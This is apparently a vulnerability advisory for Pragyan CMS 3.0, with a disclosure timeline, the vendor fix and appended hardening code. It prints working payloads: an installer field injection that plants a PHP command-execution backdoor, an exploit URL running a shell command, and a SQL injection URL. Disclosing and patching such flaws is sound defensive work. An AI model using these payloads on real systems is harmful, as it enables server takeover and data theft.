#Pragyan CMS v 3.0 multiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com, abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0

Technical Description

1) Code execution in INSTALL/install.php
The script does not correctly validate the entered fields. It is possible to write the following string in the password field:
");echo exec($_GET["a"]);echo ("
or in other fields with JavaScript turned off.
cms/config.inc.php will then contain the code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT::
http://target.com/blog/cms/config.inc.php?a=ls -la

2) SQL injection - get MySQL version
EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--

Solution
Update to Pragyan CMS 3.0 rev.274

Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclosure

Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
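
For item 1, the root cause is an installer that pastes a form value between double quotes in a generated PHP file. The sketch below is an added example, not Pragyan CMS code or the rev.274 patch: it puts that weak pattern beside a writer that emits the value through var_export(), plus a token-level check that a generated line is one define() call and nothing else. All function names are hypothetical.

```php
<?php
// Added example; function names are hypothetical, not taken from Pragyan CMS.

// Weak pattern described in the advisory: the raw value is concatenated
// between double quotes, so a quote in the value ends the string literal.
function config_line_unsafe(string $name, string $value): string {
    return 'define("' . $name . '","' . $value . '");';
}

// Hardened writer: var_export() returns a correctly escaped PHP string
// literal, so the value can never leave the literal it is written into.
function config_line_safe(string $name, string $value): string {
    if (!preg_match('/^[A-Z_][A-Z0-9_]*$/', $name)) {
        throw new InvalidArgumentException('bad constant name');
    }
    return 'define(' . var_export($name, true) . ', '
                     . var_export($value, true) . ');';
}

// Defence in depth before writing the file: the line must tokenize to
// exactly  define ( 'string' , 'string' ) ;  with no further statements.
function is_single_define(string $line): bool {
    $shape = [];
    foreach (token_get_all('<?php ' . $line) as $tok) {
        if (is_array($tok)) {
            if ($tok[0] === T_OPEN_TAG || $tok[0] === T_WHITESPACE) {
                continue;
            }
            $shape[] = token_name($tok[0]);
        } else {
            $shape[] = $tok;
        }
    }
    return $shape === ['T_STRING', '(', 'T_CONSTANT_ENCAPSED_STRING', ',',
                       'T_CONSTANT_ENCAPSED_STRING', ')', ';'];
}

// Password field value quoted in the advisory, used here as test input only.
$input = '");echo exec($_GET["a"]);echo ("';

foreach (['config_line_unsafe', 'config_line_safe'] as $writer) {
    $line = $writer('MYSQL_PASSWORD', $input);
    echo $writer, ': ', is_single_define($line) ? 'accepted' : 'rejected', "\n";
}
```

The check is deliberately strict: any generated line that is not a plain two-argument define() of string literals is refused rather than written to cms/config.inc.php.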